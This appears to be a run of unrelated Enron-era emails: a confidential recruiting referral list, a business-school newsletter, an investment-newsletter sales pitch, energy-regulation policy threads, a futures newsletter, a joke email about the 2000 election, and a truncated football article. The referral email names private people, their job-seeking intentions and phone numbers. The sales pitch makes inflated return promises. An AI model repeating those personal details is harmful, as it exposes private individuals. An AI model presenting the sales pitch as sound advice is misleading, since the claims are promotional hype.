internal audit department. She was my main contact at Equiva when I was at PwC. She is extremely diligent and very professional. I enjoyed working with her greatly and have to say she was one of the best people I have worked with in the capacity of a client/professional relationship. Marilyn has a lot of responsibilities at the alliance and is extremely well respected. She has had a difficult year as she is doing a job that should be done by 3+ people. She has mentioned to me that she is not happy about the fact that her load continues to increase, and has even mentioned finding another job. However, due to the fact that she is so well respected where she is, she may be difficult to recruit (713 277 6280). If you contact her I would not want my name associated with it due to the PwC/alliance relationship. Rebecca Crider - She has been working at Coral Energy for approximately a year, reporting to the VP of risk control. Before that she was an audit manager at AA. I have worked with her briefly and she seemed very conscientious. I do not know if she is looking or not, but its worth a try! (713 230 3000 general line). Kim Nelson - She is a manager in the risk group at AA, and just transferred over from KPMG. I have not met her, but I did hear that she is not doing what she had expected at AA. I don't know her number but you could reach her at the general AA line. Kevin Schroder - audit manager at KPMG in the energy department. I do not know him, but do know he is looking for opportunities outside the audit/consulting area (general line 713 319 2000). Keith Considine - He is currently a senior accountant at PwC. He is the best senior PwC Houston has, as well as probably one of the best people I have ever worked with (the top of his class). Although he only has 4 years of work experience (all at PwC), he performs in a manager capacity. He worked for me on the Coral Energy audit engagement and received an excellent evaluation from both myself and the partners (we all agreed that he is one of the best people any of us have seen or worked with). He is currently working on a project at one of PwC's clients to standardize their mid office processes . He definitely does not see himself as a long time employee of PwC, but is currently planning on staying there until he is promoted to manager. I actually recommended him for a promotion to manager at July 1 this year, but due to capacity issues, I don't expect that the promotion will be approved. Since I've only been with Enron a short time and would like to continue good relations with PwC, I would appreciate whoever contacts Keith to elude that it is someone else other than myself who gave you his name. His number is 713 356 5617. Dave Simpson - analyst at Koch Energy in Houston, has a degree in accounting and has work experience of about 9 months. He is very interested in leaving Koch. I know him on a person basis, but have not worked with him. He is a good guy and very likeable. I don't have his phone number, but should be reachable through the general number for Koch. Admin assistants Connie Shugart - she is currently working at PwC as an administrative assistant. She is also involved in recruiting experienced personnel for PwC's audit and internal audit service lines. She is very interested in Enron and has asked me a few times to get her a contact here. I have not worked directly with her but due to her close proximity to my office I talked to her a number of times and was very impressed. (713 356 4000 - general PwC number). Ellen Robertson - She is an administrative assistant who is looking to leave PwC. I have never worked with her, but she did come to ask me my opinion on how she should go about finding other work. (713 356 4000 PwC general line).
-----Original Message----- From: JONESNEWS -- Jones School News <[email protected]>@ENRON On Behalf Of Maileen Hamto <[email protected]> Sent: Friday, November 16, 2001 8:41 AM To: [email protected] Subject: [JONESNEWS] @Jones: News and Information from the Jones School @Jones: News and Information from the Jones School November 15, 2001 Financial Times Rankings Dean Whitaker in Time Magazine Dean's Lecture Featuring John Campbell, CEO, H-E-B Central Market -- November 28 Rice Alliance Networking Event -- December 4 Alumni Happy Hour -- December 5 Jones Student Association Partio -- December 6 All-Class Reunion -- February 28 - March 2, 2002 Prof. Stephen Zeff Honored By Academy of Accounting Historians Jones Team Wins 3rd in 2nd Annual Marketing Case Competition Class Gift Campaign: Frequently Asked Questions Rice MBAby Rompers Admissions Counselors History Live Construction Webcam Campaign ----------- News ----------- Our MBA for Executives Program is not included in the recent Financial Times rankings because we are too young. The Financial Times surveyed alumni from 1998. Our first EMBA class graduated in 2000. Dean Gil Whitaker was featured in the global business edition of the October 29 issue of Time magazine where he was identified as a "World Beater: People to Watch in International Business." Whitaker was chosen for his efforts to diversify the school and pictured with a number of black, Hispanic and women students. The entire article and photos will be posted on the website soon. http://jonesgsm.rice.edu/content/content.cfm?PageID=195 John Campbell, Chief Executive Officer of H-E-B's Central Market, will be the Dean's Lecture Series featured speaker Wednesday, November 28, from 9:45 to 11:15 a.m., Herring Hall. Campbell, who began his career as a store checker at H-E-B 30 years ago, led the way to create the premier fresh-food emporium for people who love food. After years of witnessing customers armed with coolers driving hundreds of miles to the first Austin location, H-E-B has expanded the Central Market concept with an additional store in Austin, one in San Antonio, and another in Houston, which opened May 2001. http://jonesgsm.rice.edu/content/content.cfm?PageID=104&AnnounID=196 The Rice Alliance for Technology and Entrepreneurship will host a networking event December 4 at the Hyatt Regency downtown. The event will be a part of The Capital Network's BioTech Venture Conference scheduled for December 4 and 5. For more information, contact [email protected], phone 713-348-3443, or visit http://alliance.rice.edu. Alumni are invited to the next Alumni Happy Hour, to be held Wednesday, December 5 at The Gingerman located at 5607 1/2 Morningside Drive in the Rice Village area. Look for the JGS Alumni meeting area, designated by a blue and white Rice tabletop sign. The event, a chance to network with fellow alumni, will be very informal. Please come after work (around 6:00 ish), bring friends and look for other JGSers! If you would like to participate in planning these events or have additional input, please feel free to contact either Brian Harry (MBA '99) at [email protected], Mira Balakrishnan (MBA '95) at [email protected], or the JGS Alumni Office at [email protected]. The Jones Student Association hosts the last Partio for the fall session between 4 and 6 p.m. on Thursday, December 6, at the Herring Hall Patio. For more information, contact [email protected] or call 713-348-5371. http://jonesgsm.rice.edu/news/calendar/index.cfm?EventRecord=2307&DD=0 Mark your calendars for the third annual All Class Alumni Reunion Event, scheduled from Thursday through Saturday, February 28 - March 2, 2002. Chuck Watson, CEO, Dynegy, is keynote speaker for the 27th Annual Alumni Dinner scheduled for February 28. Participants will enjoy the annual student/alumni golf tournament, new building tours, and the annual reunion reception on March 1. Alumni College and the Dean's Lunch will be held on March 2. For more information, contact Deanna Sheaffer, MBA '96, Director of Alumni Affairs, [email protected]. For his work on a biography commended by accounting history scholars throughout the world, Prof. Stephen Zeff, Herbert S. Autrey Professor of Accounting, receives his second Hourglass Award from the Academy of Accounting Historians. http://jonesgsm.rice.edu/content/content.cfm?PageID=104&AnnounID=197 At the 2nd Annual Marketing Case Competition held this past weekend, the Jones School team of John Andell, Jeffrey Floresca, Cheryl Lo, Christi Neuenschwander, and Jacob Ratner won third prize. First prize went to the Yale University team, while the team from the University of Minnesota won second prize. Seven teams competed at the event, the largest marketing case competition in the nation. The Jones Graduate School Class Gift Challenge is to get all classes to make class gifts to the Jones School in honor of the Next Century Campaign and the 26th graduating class. The class (or classes) with the highest participation rate will be honored with a dinner in the new building. For more information, contact Maya Houston, [email protected]; phone 713-348-6145. http://www.jonesgsm.rice.edu/campaign/campaign_alumni3.html Alumni Moms and Dads may receive a free Rice MBAby baby romper for the newest addition to their family. Send us a picture of your baby wearing the romper for the alumni website. http://jonesgsm.rice.edu/alumni/alumni_keeping.html --------- Online --------- Admissions counselors recruit, interview and evaluate prospective candidates. An elite group of second year students, these counselors embody the collaborative, diverse, and enriching experience that represents the Rice MBA. http://jonesgsm.rice.edu/content/content.cfm?PageID=145 As the Jones School celebrates its 25th anniversary, we invite you take a retrospective look at the last 25 years and a peek into the future of the Jones School. http://jonesgsm.rice.edu/alumni/history Visit the construction web cam URL for up-to-the-minute live feeds of the new Jones School building construction. http://jonesgsm.rice.edu/campaign/Jonescam. For construction notes and updates, click http://project.rice.edu/jones/. Learn about new and upcoming initiatives and programs at the school, and view artist renderings of the new $60 million building, currently under construction. http://jonesgsm.rice.edu/campaign. --------------------------------------- @Jones: News and Information from the Jones School, the Jones School e-newsletter, is published monthly by the Public Relations Department of the Jesse H. Jones Graduate School of Management. The Jones School website http://jonesgsm.rice.edu is updated frequently and we encourage you to visit the site regularly to get the latest news and information about new initiatives and programs at the Jones School. To submit items to be posted on the Jones School website, please e-mail [email protected] or call 713-348-6364.
Dear Investor, So far, so good. My early-October projection of Dow 10,000 by Thanksgiving came true a few days early. Now I expect the market to zigzag its way somewhat higher over the course of the next two years. But please, don't go out and "buy the market." Index funds and the like may make you richer...but they won't make you truly RICH. That's because the gap between winners and losers will be quite large -- in some cases HUGE -- in the reawakening ahead. YOU SEE, in some ways the economic and market pessimists are RIGHT. Things are different this time around. And it's unwise to expect a rising tide that lifts all boats. But the right stocks will pay you handsomely if you buy them now. The pessimists may rail about Japan's debt load, the mess in Argentina and Enron's collapse. But frankly, my friend, the sky is not all gray. We're actually beginning to see some upward earnings revisions. And a handful of stocks we own -- like Cendant, SEI Investments and Harrah's Entertainment -- are already UP 40%-to-50% from September's lows. More will follow. As you'll discover, the pessimists are WRONG about the most important issue: We're not headed for some deflationary death grip or worldwide economic disaster -- despite the evidence they cite. Rather we are in the midst of economic change -- marked by harsh competition, rapid innovation and hand wringing -- that is a STOCK PICKER'S DREAM. And in just a moment, I'll share my finely-honed strategy for market-beating gains -- one that could easily make you 50% RICHER by the end of the year. SO PLEASE excuse me if I don't buy all the doom and gloom. I respect the intelligence and opinions of the pessimists. But for more than 20 years, I've chosen to go my own way...discover the facts on my own...and stand up for what I see. In fact, I visited 18 countries on five continents last year. I live part of the year in Europe; just visited Argentina to size up that situation for myself; and regularly spend weeks at a time in Greater China. Why? Because like it or not, we truly live in a global economy. And by understanding how it works, I help my clients SAFELY GROW RICH. HOW? A time-tested strategy that identifies hot growth prospects, when the risk of owning them is near -- or at -- its lowest point. That's why the companies I choose span a host of industries, but they all have four things in common: 1. Financials that show a company solidly in an upward trend; 2. Management with a laser-like focus on improving the bottom line; 3. Distinct competitive advantages within its market niche; 4. And a stock price selling at the low end of its usual trading range. THAT'S THE ONLY WAY to invest for low-risk, fortune- building gains. And once you join me, I know you'll agree. I've just put the finishing touches on my annual list of "PROFIT ROCKETS" for my Investor's World clients and thought you might want a peek, as well. In fact, you can get it IMMEDIATELY with a few simple mouse-clicks -- and 100% RISK-FREE, as well. Since I first issued this annual forecast back in 1995, my clients have really cleaned up -- shouldn't you make a pile of money this year, too? From the beginning of 1995 through the end of 2001, this annual portfolio of "Profit Rockets" has racked up a cumulative gain of 287.5%! That's over a seven- year period. Do the division yourself and see how it looks. NOT BAD! And that time period includes the worst bear market of the last 25 years -- we were actually UP another 14% in 2001. Today, I provide this portfolio solely to my Investor's World clients. But I first started making this "annual forecast" in 1995 as a regular panelist on Wall $treet Week With Louis Rukeyser. IN 1995, I was #1 among over 20 world-class investors with gains of 63.3% -- as audited by Bloomberg. In 1996, I "slipped" to #2. And in 1999, I just missed out on top honors with a NICE FAT 60.4% GAIN. And frankly, I've been helping investors like you to oversized gains for more than twenty years now. When the pessimists cried that oil was going to $100 a barrel in the 1980s, I led my clients to the rational truth and more big profits. After the crash of 1987, I debated every pessimist I could find. And back in 1993 -- with stocks in the dumps and the pessimists having a field day -- I told clients to buy for the greatest bull market in history. I was right each time. And I'm staking my reputation -- and my own money -- on the well-considered belief that I'm right again. So please, I urge you, try my Investor's World advisory RISK-FREE. As soon as you sign up, you'll get my full list of 10 Profit Rockets for 2002 immediately, online. Just click here now: http://www.ppi-orders.com/index.htm?promo_code=1AL121 Sincerely, John P. Dessauer, Editor Investor's World P.S. Remember, this is a 100% RISK-FREE offer. If my new "Top 10" list doesn't pique your interest -- or if you're dissatisfied with my service for any reason -- you get every penny of your subscription cost back. Best of all, this isn't some 30-day -- or even 90-day -- guarantee. It's good for six full months. Please click here now: http://www.ppi-orders.com/index.htm?promo_code=1AL121 ------------------------------------------------------ ACCOUNT MANAGEMENT We hope this free digest of investing advice is valuable to you. If you'd like to change your e-mail address ([email protected]), or unsubscribe, please do so by going to the following address: http://www.investorplace.com/unsubscribe.php Your name will be removed from our list within 7-10 working days. ------------------------------------------------------ Sunday Jan 13, 2002 09:07:37
Alan -- Not sure if the West Desk is interested in Demand Bidding issues with the ISO, but wanted you to loop around with the commercial people to see if there are any specific problems with the current ISO programs. Please communicate any issues with Harry Kingerski. Jim ----- Forwarded by James D Steffes/NA/Enron on 03/26/2001 08:33 AM ----- Harry Kingerski 03/23/2001 04:00 PM To: Neil Bresnan/HOU/EES@EES, Jay Ferry/HOU/EES@EES, Fred L Kelly/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Jubran Whalan/HOU/EES@EES, Dennis Benevides/HOU/EES@EES cc: Leslie Lawner/NA/Enron@Enron, Alan Comnes/PDX/ECT@ECT, Jeff Dasovich/NA/Enron@Enron, James D Steffes/NA/Enron@Enron Subject: FW: Demand Bidding Legislation (what used to be AB31X- Wright) We are working to get demand bidding into CA legislation (AB31X). The ISO wants from us our laundry list of issues of why their existing programs are inadequate. This is a great opportunity to influence them. Neil and Jubran, could you give us your specific issues and suggestions? Jay and Fred, any suggestions would be great from you also. We will set up a call for Monday at 4 pm CST to discuss and will get phone number out to you. Thanks. ----- Forwarded by Harry Kingerski/NA/Enron on 03/23/2001 03:50 PM ----- MDay <[email protected]> 03/23/2001 03:37 PM To: "'Harry Kingerski'" <[email protected]>, "'Jim Steffes, Enron'" <[email protected]>, "'Leslie Lawner, Enron'" <[email protected]>, "'Sandi McCubbin Enron SF'" <[email protected]> cc: "'Jeff Dasovich Enron SF'" <[email protected]>, "'Scott Govenar, Enron lobbyist'" <[email protected]>, "'Sue Mara at Enron SF'" <[email protected]>, "'Bev Hansen, Enron lobbyist'" <[email protected]>, "'Hedy Govenar, Enron Sacto lobbyist'" <[email protected]> Subject: FW: Demand Bidding Legislation (what used to be AB31X- Wright) Here is a note from Mike Florio of the ISO Board. This is encouraging, he wants to talk further about how the ISO programs can be changed to accomplish what we want. What would be most helpful is an item by item analysis by EES (read: Harry and his people) as to why the existing or proposed ISO programs are inadequate (or why we need to have 31X amended to have the ISO do programs for direct access customers parallel to the utility programs in 31X.) I need this information soon in order to keep the dialogue going with Florio. Thanks for your help. Mike Day -----Original Message----- From: Mike Florio [mailto:[email protected]] Sent: Wednesday, March 21, 2001 7:51 PM To: MDay Subject: Re: Demand Bidding Legislation (what used to be AB31X- Wright) Just to show how up to speed I am, I thought that the ISO was already planning to do this. Their presentation on demand programs at the last board meeting showed a scheduling coordinator option and a UDC option, with different billing and settlement provisions for each. But it's hard for me to judge what is adequate (and user-friendly) and what is not absent some expert help. I'm definitely interested in the concept and have no great faith in utility management of programs of this nature. Let's pursue. MIKE P.S. In his own inimitable way, Dan Richard "offered" me the ORA job way back when. I said: "Gee, Dan, I thought we were friends!" When he acted all surprised and hurt in that way of his, I reminded him that Marty Lyons and Mark Loy come with the turf. End of discussion. At 05:05 PM 3/21/2001 -0800, you wrote: >Mike: > >I wanted your reaction to a proposal we were making in response to the >Wright 31X bill on demand bidding programs. We strongly support these >programs, and feel that ESPs can bring a lot of benefit to the program by >aggregaring customers, educating them on the benefits of bidding "Negawatts" >and helping to meter and verify their load reductions. We are certain that >we could help enroll more customers in the program than if the utilities >alone were in charge. So, we proposed language for 31X which allowed ESPs >to aggregate customers in the utility day ahead and hour ahead programs, and >proposed an additional day ahead program based on economic value, (not >reliability criteria, like reserve margins). > >The utilities and the large customers wanted to clarify that we would not >include direct access customers in the utility programs, because of the odd >funding source (reductions from the amounts paid to DWR). We agreed with >the concept, we don't want to fund demand reduction programs for Direct >Access customers through DWR payments, but we also feel strongly that there >should be similar non-discriminatory demand reduction programs for all types >of customers, including DA. So we came up with the idea of inserting >language in the bill to require the ISO to institute demand bidding programs >which match the ones mandated in the bill for the IOUs. I gave our >suggestion to Robin Larson, and I don't imagine you've seen it yet, but >would you give me your reaction to the basic concept? I looked at the ISO >website and tried to evaluate the demand bidding programs already in >place--with a limited amount of understanding, but Enron's business folks >indicated that they did not consider the existing programs to be the >equivalent of what the utilities will be implementing. If that is so, how >about putting similar programs in place so we can actively market and >encourage all customers to bid their negawatts (especially the economic, bid >and contract in advance deals) so that the ISO can count on the demand >reductions in advance of a day's operations? > >I await your response. > >I am so sorry you are not the next ORA director, I was certain you would be >appointed to that, too. (gallows humor) > >Mike Day
CONSENSUS Market Advisory Newsletter Each Tuesday the CONSENSUS Newsletter will feature a leading selection from 225 +/- weekly articles from CONSENSUS National Futures and Financial Weekly appearing online at <A HREF="http://www.consensus-inc.com/"> http://www.consensus-inc.com/</A> or in print. ============================================================= TRADING FUTURES...In An Online World "e-Commerce is about to change every rule of business in the commodities futures market." MarcusEvans conference being held January 18 and 19, 2001 in New York City Key Benefits of Attending *Explore the business forces driving competition and change *Advance your firm's e-commerce strategy *Envision FCMs and their evolving role in the digital age *Understand the future of electronic exchanges and their impact on trading *Streamline operations, increase volume and reduce costs to enhance your bottom line For more information contact: Yael Kruman, 212-483-1193, One Exchange Plaza, 55 Broadway, 26th Floor, New York NY 10006 or by e-mail to [email protected] ============================================================= FREE ONLINE TRIAL Call for your FREE ONLINE trial to our secure site: 800-383-1441 or 816-461-2800. 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Partial Outline of leading articles in current issue of CONSENSUS. ============================================================= FEATURED SELECTION: THE JANUARY EFFECT DID IT START THIS SPRING? by Kansas City Board of Trade, Kansas City, Missouri (December, 2000) When we embarked into the year 2000, industry analysts questioned whether the phenomenon known as the January Effect would occur as many changes were in store. There were many questions about Y2K and any technical glitches that might appear. Thankfully, there were not any problems, but a very different year was in store for the markets... Read the complete article at <A HREF="http://www.consensus-inc.com/newsletter/feature.htm"> http://www.consensus-inc.com/newsletter/feature.htm</A> ============================================================= CONSENSUS Index of Bullish Market Opinion Contrary opinion index of market advisors 75% + overbought 25% - oversold FEATURED MARKET: COCOA: 29% For more information on all of the CONSENSUS Index of Bullish Market Opinion percentages please go to our sample online issue at http://www.consensus-inc.com/01999si/ <A HREF="http://www.consensus-inc.com/">Consensus - National Futures and Financial Investment Newspaper</A> To obtain the CONSENSUS Index of Bullish Market Opinion for all 33 markets, please call 900-328-1131 for only $2.99 per minute, updated each Tuesday by 8:00 PM Central Time. ============================================================= To view TOTAL outline of current issue, visit our website <A HREF="http://www.consensus-inc.com/">http://www.consensus-inc.com</A> "Issue Preview" PARTIAL OUTLINE OF FEATURED ARTICLES IN CURRENT ISSUE OF CONSENSUS FUTURES AND FINANCIAL WEEKLY: WILL THE ELECTION EVER END? by AIC Investment Advisors, Inc. (December 4, 2000) For millions of Americans familiar with hotly contested presidential election campaigns and then the concession speech by the loser, either election night or the following day, the current morass in Florida is astonishing. Surrounded by seemingly battalions of lawyers of whom many are nothing more than town-hall hangers-on, the battle in various courts seems to stretch to the horizon... SOYBEAN PRICES: HEADED HIGHER by Richard A. Brock & Associates, Inc. (December 1, 2000) Despite the fact a record amount of soybeans were harvested in both North and South America in 2000, and Brazil and Argentina are both set to produce another record crop, soybean prices have been working higher the past few weeks. How can prices move higher if the world is awash in soybeans?.. OPTIONS FOCUS by Salomon Smith Barney (November 2000) Stock index futures and options provide investors with efficient tools to help minimize losses in a declining stock market. If the price correlation of a stock portfolio and the index futures used as a hedge is high, the risk on that equity portion protected by the futures could be neutralized or its exposure reduced against the effects of a market decline or advance... ============================================================= Thank you for reading the CONSENSUS Market Advisory Newsletter. In the future we plan to include special offers, contests and other features. The next issue of our newsletter will be e-mailed December 19. CONSENSUS, INC. PO Box 411128, Kansas City, MO 64141 816-461-2800 or 800-383-1441 mailto:[email protected]
---------------------- Forwarded by Chris Dorland/HOU/ECT on 11/15/2000 04:26 PM --------------------------- Michael McDermott <[email protected]> on 11/15/2000 05:05:34 AM To: "'Alexis Dodin'" <[email protected]>, "'Angus Cowan'" <[email protected]>, "'B.K. Milne'" <[email protected]>, "'Bradley'" <[email protected]>, "'Bryan Moody'" <[email protected]>, "'Carlo & Sophia'" <[email protected]>, "'Catriona Work'" <[email protected]>, "'Chris Blaker'" <[email protected]>, "'Chris del Valle'" <[email protected]>, "'Chris Dorland'" <[email protected]>, "'David Redmond'" <[email protected]>, "'Francesco Cicoli-Abad'" <[email protected]>, "'George Potter'" <[email protected]>, "'Haakon Olafsson'" <[email protected]>, "'Jason Blaker'" <[email protected]>, "'Jasvinder Pal Singh Badyal'" <[email protected]>, "'Kent Brown'" <[email protected]>, "'Kevin McElroy'" <[email protected]>, "'Lionel Greene'" <[email protected]>, "'Nils'" <[email protected]>, "'Rob Laird'" <[email protected]>, "'Stefan van Riet'" <[email protected]>, "'Urvesh'" <[email protected]> cc: Subject: The result of the US election - This is very funny > > > >Not everyone can wait for the recount.. > > > > > >--------------------------------------------- > >NOTICE OF REVOCATION OF INDEPENDENCE > > > >To the citizens of the United States of America, > > > >In the light of your failure to elect a President of the USA and > thus to > >govern yourselves, we hereby give notice of the revocation of your > >independence, effective today. > > > >Her Sovereign Majesty Queen Elizabeth II will resume monarchial > duties > over > >all states, commonwealths and other territories. Except Utah, which > she > >does not fancy. Your new prime minister (The rt. hon. Tony Blair, > MP for > >the 97.85% of you who have until now been unaware that there is a > world > >outside your borders) will appoint a minister for America without > the need > >for further elections. Congress and the Senate will be disbanded. > A > >questionnaire will be circulated next year to determine whether any > of you > >noticed. > > > >To aid in the transition to a British Crown Dependency, the > following > rules > >are introduced with immediate effect: > > > >1. You should look up "revocation" in the Oxford English Dictionary. > Then > >look up "aluminium". Check the pronunciation guide. You will be > amazed > at > >just how wrongly you have been pronouncing it. Generally, you > should > raise > >your vocabulary to acceptable levels. Look up "vocabulary". Using > the > >same > >twenty seven words interspersed with filler noises such as "like" > and "you > >know" is an unacceptable and inefficient form of communication. > Look up > >"interspersed". > > > >2. There is no such thing as "US English". We will let Microsoft > know on > >your behalf. > > > >3. You should learn to distinguish the English and Australian > accents. It > >really isn't that hard. > > > >4. Hollywood will be required occasionally to cast English actors as > the > >good guys. > > > >5. You should relearn your original national anthem, "God Save The > Queen", > >but only after fully carrying out task 1. We would not want you to > get > >confused and give up half way through. > > > >6. You should stop playing American "football". There is only one > kind of > >football. What you refer to as American "football" is not a very > good > >game. > >The 2.15% of you who are aware that there is a world outside your > borders > >may have noticed that no one else plays "American" football. You > will no > >longer be allowed to play it, and should instead play proper > football. > >Initially, it would be best if you played with the girls. It is a > >difficult > >game. Those of you brave enough will, in time, be allowed to play > rugby > >(which is similar to American "football", but does not involve > stopping > for > >a rest every twenty seconds or wearing full kevlar body armour like > >nancies). We are hoping to get together at least a US rugby sevens > side > by > >2005. > > > >7. You should declare war on Quebec and France, using nuclear > weapons if > >they give you any merde. The 98.85% of you who were not aware that > there > >is > >a world outside your borders should count yourselves lucky. The > Russians > >have never been the bad guys. "Merde" is French for "shit". > > > >8. July 4th is no longer a public holiday. November 8th will be a > new > >national holiday, but only in England. It will be called > "Indecisive > Day". > > > >9. All American cars are hereby banned. They are crap and it is for > your > >own good. When we show you German cars, you will understand what we > mean. > > > >10. Please tell us who killed JFK. It's been driving us crazy. > > > >Thank you for your cooperation. > > > > > > > > > >Hugh Richards > >Senior Training Consultant - EMEA London > >Office: +44(0)207 786 3013 > >Fax: +44(0)207 786 3001 > >Mobile: +44(0)7720350706 > > > > > >S2 Systems International, Ltd. > >30 City Road > >London, EC1Y 2AY > >United Kingdom > > > > > >CONFIDENTIALITY NOTICE > >The information contained in this transmission is confidential. It > may > also > >be legally privileged. It is intended only for the addressee(s) > stated > >above. If you are not an addressee you should not disclose, copy, > circulate > >or in any other way use the information contained in this > transmission. > >Such unauthorized use may be unlawful. If you have received this > >transmission in error, please telephone us immediately so that we > can > >arrange for its return. > > > > > > > > > > > ______________________________________________________________________ > ___ > Get Your Private, Free E-mail from MSN Hotmail at > http://www.hotmail.com. > > Share information about yourself, create your own public profile at > http://profiles.msn.com.
Charles -- I fully agree that we must integrate the NERC plans and systems (or improvements to the NERC model) into our RTO model. I hope that is something you can coordinate with the project as this develops. Thx, Jim To: James D Steffes/HOU/EES@EES cc: Jeff Brown/HOU/EES@EES, Janine Migden/DUB/EES@EES, Joe Hartsoe/Corp/Enron, Ron McNamara/HOU/EES@EES, Steve Montovano/DUB/EES@EES, Dan Staines/HOU/ECT@ECT@EES, Robin Kittel/HOU/EES@EES, Sarah Novosel/Corp/Enron, Kerry Stroup/DUB/EES@EES, Christi L Nicolay/HOU/ECT@ECT@EES, Steve Walton/HOU/ECT@ECT@EES, Tom Delaney/Corp/Enron, Howard Fromer/HOU/EES@EES, Daniel Allegretti/HOU/EES@EES, Richard Shapiro/HOU/EES@EES, Steven J Kean/HOU/EES@EES Subject: Re: Transmission / Wholesale Market Regional Plans Jim a BIG external factor that is directed to the item (2) ISO Systems & Procedures: At the NERC Electronic Scheduling Task Force meeting today, there was considerable discussion on how this Task Force (which was formed before the OASIS ANOPR was posted) would coordinate on an industry-wide basis, a NERC response to the OASIS Phase II ANOPR. Here are some important points a FERC Staff member (Marv Rosenberg) made at the meeting. These should be kept in mind in developing the Enron proposal and the process of getting buy-in in each of the Regions/RTOs. - FERC prefers a single industry consensus filing. - The ANOPR is intended to tie RTO Order 2000 together with new OASIS II requirements - Does not preclude individual RTOs or entities from submitting proposals. However a diversity of filings will indicate non-consensus and FERC will make its own decisions which will likely not be industry friendly. FERC is asking the industry for communication and Business Practices standards for issuing in a NOPR. FERC is looking for: - more functionality and to be more user-friendly - electronic scheduling - electronic reservations - reduce duplication of information entry for customers - not intended to dictate the Control Area to Control Area communications I asked Marv to clarify this - He explained that although not required, FERC welcomes propsals to address the control area source/sink issues as part of an OASIS II solution (ie Entergy Source/Sink Order) OASIS II should: - continue use of Web browsers - use templates for file transfers (uploads and downloads) - all displays do not have to look the same - but encourages a common look and feel - within a RTO, business practicese may differ, but between RTOs the practices must be standardized We need to keep close to the NERC efforts since FERC has historically tended to favor NERC proposals because they tout an air of industry consensus. The clarificaton to the ANOPR given by Marv should make buy-in an important element of our proposal. If FERC adopts the NERC filing, we will likely be stuck with the exisiting contract path seams problems and LMP fragmentation in the East because NERC is not proposing any tariff changes. Also we will not get the control area source/sink issue resolved since it will be impossible to resolve at NERC in 7 months. Of course, another option would be to incorporate our efforts with this Task Force. James D Steffes@EES 08/02/2000 05:52 PM To: Jeff Brown/HOU/EES@EES, Janine Migden/DUB/EES@EES, Charles Yeung/HOU/ECT@ECT, Joe Hartsoe/Corp/Enron@ENRON, Ron McNamara/HOU/EES@EES, Steve Montovano/DUB/EES@EES, Dan Staines/HOU/ECT@ECT, Robin Kittel/HOU/EES@EES, Sarah Novosel/Corp/Enron@ENRON, Kerry Stroup/DUB/EES@EES, Christi L Nicolay/HOU/ECT@ECT, Steve Walton/HOU/ECT@ECT, Tom Delaney/Corp/Enron@ENRON, Howard Fromer/HOU/EES@EES, Daniel Allegretti/HOU/EES@EES cc: Richard Shapiro/HOU/EES@EES, Steven J Kean/HOU/EES@EES Subject: Transmission / Wholesale Market Regional Plans 1. I appreciate everyone who participated in the call today. I think that the discussion proved that we can find consensus on a reasonable approach for transmission pricing and energy markets. 2. To make more clear about the Regional Plans, I think that we need to consider the following. A. BACKGROUND Timelines of Current Process Current Players & Current Positions Allies Key Issues now facing the process B. MOVING FORWARD Top Issues upcoming External Factors (e.g., will Entergy join SPP) Resource Needs Relationship to Commercial Objectives / Business Plans C. OTHER ISSUES / CONCLUSION I hope this helps set an outline for the Regional Plans. The key idea is that I want to make sure everyone has a calendar of where we are going and what issues need to be addressed. Don't be shy about adding other topics and issues. We need to have this to communicate within our group and to the commercial people. I don't expect this to be easy, but I think that it will be helpful. 3. I think that we need to put more detail around the entire structure. This would entail developing four things (1) a tariff, (2) ISO Systems & Procedures, (3) Day Ahead PX Energy Market, (4) Transmission Flowgate PX Market. These are the four building blocks to a New Marketplace. My hope is for Enron to put these things out in a detailed framework using "off the shelf" material. I know that Tom Delaney has already started working on a tariff. I think we could adapt the Cal PX model into point 3. We could probably use the APX Flowgate System for point 4. On the ISO, maybe we could go to ESCA and have a Detailed Scope / Work Plan and fees on setting up an ISO (including costs of operation over time). It would make sense to me to do this very formally (including setting energy market zones and defining the commercially significant Flowgates). I would use the MISO as the market to focus on, but am willing to listen to other thoughts. Please let me know what everyone thinks. Jim
Check out the part about Simms weight. Big 12: Applewhite eager to reclaim his job By Mark Wangrin Express-News Staff Writer AUSTIN * It runs up and down the inside of Major Applewhite's left knee, a four-inch shiny pink speed bump of a scar. If it could talk, it would tell of how the anterior cruciate ligament buckled as its owner planted while trying to avoid a relentless Arkansas pass rush at the Cotton Bowl on Jan. 1. It would tell of the reconstructive surgery by team orthopedist Dr. Carey Windler, how the joint was whipped back into shape with hours of work and carefully tended with ice bags and heat and extra stretching and anything else Applewhite had read, heard or seen that would help keep his return on pace. If the joint could talk, it would tell people how everything's fine inside, how Applewhite could drop back and plant, set up or scramble, in a real live game today if one was scheduled. If it could talk ... well, Applewhite might well be the happiest guy on the planet. Being a quarterback, team guy and newly inaugurated Student Government representative, Applewhite tries to be diplomatic, but part of him wishes he wouldn't have to answer a steady barrage of questions about his knee, no matter how well-meaning the fans might be. "I don't want to be rude," he said last week. "I just wish they'd stop asking. I love them, appreciate them, but it's getting a little ..." Got the picture. OK. So here's the word: Applewhite is 100 percent * even ahead of schedule. Ready to take on the challenge to his starting job from sophomore quarterback Chris Simms, who with only one career start has graced the cover of The Sporting News football preview and had an ESPN Magazine cover shoot last week This word on Applewhite's fitness comes not just from the junior player, but from the man who's worked most closely with him, physical therapist Allen Hardin. Applewhite, Hardin stresses unequivocally, is ready to play now. Hardin said Applewhite has tested 5 to 10 percent above the expected range when he's had periodic strength and flexibility tests on the injured leg. During rehab, Hardin ditched the pool work, concentrating instead on sport-specific movements, shortly after Applewhite observed that very few football games are played under water. One of the most effective of the workouts involved pulling on Applewhite with rubber tubing as the quarterback moved, cut and set up, strengthening his supporting muscles and improving his balance. "If I came in and told him to do what he did yesterday, he wasn't happy, because he wanted to be challenged," Hardin said. "It was a challenge to come up with things to challenge him." "The only difference I can tell about the knee is it takes longer to warm up," Applewhite said. "I'll jog for four minutes instead of two, stretch for six minutes instead of five." After workouts, Applewhite dutifully ices his knee, though he does so based more on conventional wisdom than necessity. "I've always heard you can get tendinitis, so I ice it," he said. "I don't have any of the symptoms, so it feels like I'm icing it for no reason." In some ways, Applewhite feels he's better for the injury, not the least of which being a renewed appreciation for the game. "So what if I'm tired?" he said. "I can rest when I die." Resting now isn't a bad thing, either. Applewhite said missing spring drills was a boon for his arm. "I was throwing so much during the spring (of 1999), summer and season that it felt like my arm was run ragged," he said. Of course, the knee questions will be answered the first time Applewhite takes a hit in the fall. The other question, the one that he can't shake, will take a little longer. Who's the starter going to be * Applewhite or Simms? "I'd be quick to drop in comments about Chris," Hardin said of his occasional, and apparently unnecessary, mention of Simms as a motivational ploy. "But I think 